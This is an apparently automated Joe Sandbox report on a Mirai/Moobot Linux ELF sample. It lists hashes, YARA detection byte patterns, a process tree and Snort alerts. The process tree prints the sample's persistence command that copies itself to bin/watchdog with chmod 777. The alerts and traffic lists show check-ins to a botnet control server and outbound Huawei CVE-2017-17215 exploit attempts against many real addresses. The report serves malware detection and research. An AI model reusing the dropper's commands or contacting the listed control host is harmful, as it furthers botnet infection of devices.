Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
XHZFo8hExw.elf

Overview

General Information

Sample Name:XHZFo8hExw.elf
Original Sample Name:f90025024613f3a9d54373f3cc68eefd.elf
Analysis ID:830724
MD5:f90025024613f3a9d54373f3cc68eefd
SHA1:b44c167b326ff981979a38c1086cebe9d27feb66
SHA256:d502542baec72142eef5bbe366c81681acaca46c920c37c724d2cd0b8a93a223
Tags:32elfintelmirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830724
Start date and time:2023-03-20 16:35:09 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 32s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:XHZFo8hExw.elf
Original Sample Name:f90025024613f3a9d54373f3cc68eefd.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: XHZFo8hExw.elf

Runtime Messages

Command:/tmp/XHZFo8hExw.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: cannot open : No such file

Process Tree

  • system is lnxubuntu20
  • XHZFo8hExw.elf (PID: 6226, Parent: 6119, MD5: f90025024613f3a9d54373f3cc68eefd) Arguments: /tmp/XHZFo8hExw.elf
    • sh (PID: 6227, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6227)
      • rm (PID: 6228, Parent: 6227, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6227)
      • mkdir (PID: 6229, Parent: 6227, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6230, Parent: 6227)
      • chmod (PID: 6230, Parent: 6227, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
XHZFo8hExw.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    XHZFo8hExw.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      XHZFo8hExw.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xc218:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc22c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc240:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc254:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc268:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc27c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc290:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc2a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc2b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc2cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc2e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc2f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc308:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc31c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc330:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc344:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc358:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc36c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xc3a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      XHZFo8hExw.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0xa011:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      XHZFo8hExw.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x45e0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      Click to see the 5 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6226.1.0000000008048000.0000000008056000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6226.1.0000000008048000.0000000008056000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6226.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xc218:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc22c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc240:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc254:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc268:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc27c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc290:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc2a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc2b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc2cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc2e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc2f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc308:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc31c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc330:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc344:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc358:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc36c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc380:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc394:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xc3a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6226.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
          • 0xa011:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
          6226.1.0000000008048000.0000000008056000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x45e0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          Click to see the 6 entries

          Snort Signatures

          Timestamp:192.168.2.23103.161.181.9751628569992030490 03/20/23-16:35:53.346108
          SID:2030490
          Source Port:51628
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23156.224.11.11456256372152835222 03/20/23-16:36:47.049175
          SID:2835222
          Source Port:56256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.237.5.20140986372152835222 03/20/23-16:36:24.420831
          SID:2835222
          Source Port:40986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23157.122.72.6939570372152835222 03/20/23-16:36:24.331963
          SID:2835222
          Source Port:39570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.36.233.7039590372152835222 03/20/23-16:37:00.531602
          SID:2835222
          Source Port:39590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23147.46.79.13732976372152835222 03/20/23-16:37:21.136876
          SID:2835222
          Source Port:32976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:103.161.181.97192.168.2.2356999516282030489 03/20/23-16:37:52.298836
          SID:2030489
          Source Port:56999
          Destination Port:51628
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.68.9839574372152835222 03/20/23-16:36:06.532616
          SID:2835222
          Source Port:39574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.237.5.20140988372152835222 03/20/23-16:36:24.422131
          SID:2835222
          Source Port:40988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23154.38.241.21259410372152835222 03/20/23-16:36:58.418193
          SID:2835222
          Source Port:59410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.56.4557594372152835222 03/20/23-16:37:32.803566
          SID:2835222
          Source Port:57594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2327.0.158.18046574372152835222 03/20/23-16:36:00.398384
          SID:2835222
          Source Port:46574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.239.113.3144976372152835222 03/20/23-16:36:12.950349
          SID:2835222
          Source Port:44976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23163.15.165.2239134372152835222 03/20/23-16:37:53.743391
          SID:2835222
          Source Port:39134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: XHZFo8hExw.elfReversingLabs: Detection: 58%
          Machine Learning detection for sample
          Source: XHZFo8hExw.elfJoe Sandbox ML: detected

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:51628 -> 103.161.181.97:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.161.181.97:56999 -> 192.168.2.23:51628
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46574 -> 27.0.158.180:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39574 -> 197.39.68.98:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44976 -> 41.239.113.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39570 -> 157.122.72.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40986 -> 41.237.5.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40988 -> 41.237.5.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56256 -> 156.224.11.114:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59410 -> 154.38.241.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39590 -> 41.36.233.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57594 -> 197.39.56.45:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32976 -> 147.46.79.137:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39134 -> 163.15.165.22:37215
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 197.128.70.122 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.7.38.32 ports 1,2,3,5,7,37215
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 46574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39574
          Source: unknownNetwork traffic detected: HTTP traffic on port 44976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44976
          Source: unknownNetwork traffic detected: HTTP traffic on port 39570 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40986 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40986
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40986
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40988
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40988
          Source: unknownNetwork traffic detected: HTTP traffic on port 56256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39590 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39590
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 36.220.195.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.24.32.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 190.198.11.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.242.39.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.26.87.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.89.169.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 76.99.245.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.198.201.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 156.103.226.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 183.62.90.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 149.119.186.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.5.2.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.152.184.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.216.108.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 125.33.207.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 115.9.59.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.134.14.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 60.74.64.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.40.121.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.8.63.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 132.111.249.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.32.54.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 69.175.58.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 185.247.192.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.17.139.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 184.200.42.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.143.186.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.162.212.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.226.249.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.204.245.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.204.127.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.68.219.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.162.131.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 167.130.212.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 143.207.8.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.215.34.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 219.76.204.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.189.119.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.59.192.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.117.162.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 43.179.170.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.19.49.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 50.189.204.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.46.249.106:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.128.130.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 142.0.83.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.223.83.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 71.250.85.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.28.70.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.177.52.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.5.148.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.170.134.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.136.33.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.137.17.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.72.253.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.225.39.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.84.167.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.195.74.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.204.192.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.192.68.113:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 164.71.49.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 204.226.7.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 144.98.214.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 19.10.183.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 117.213.230.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.102.113.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.157.138.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.21.220.106:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.197.113.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.238.46.81:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.51.243.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.125.3.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.0.109.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.141.123.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.77.98.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.7.38.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 49.141.117.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 19.148.67.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 109.89.200.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.183.228.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.66.234.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.22.232.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.12.32.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.17.241.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 205.128.148.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.170.101.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.171.146.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.230.164.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.247.197.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.103.204.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.11.252.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.183.89.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.93.13.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 83.176.101.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.197.198.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.80.99.22:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.16.86.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.231.95.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 145.112.234.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.231.13.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.59.14.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 207.175.84.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 178.148.14.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.80.194.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.203.174.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 90.87.189.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.173.75.173:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 206.209.105.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 188.163.57.227:37215
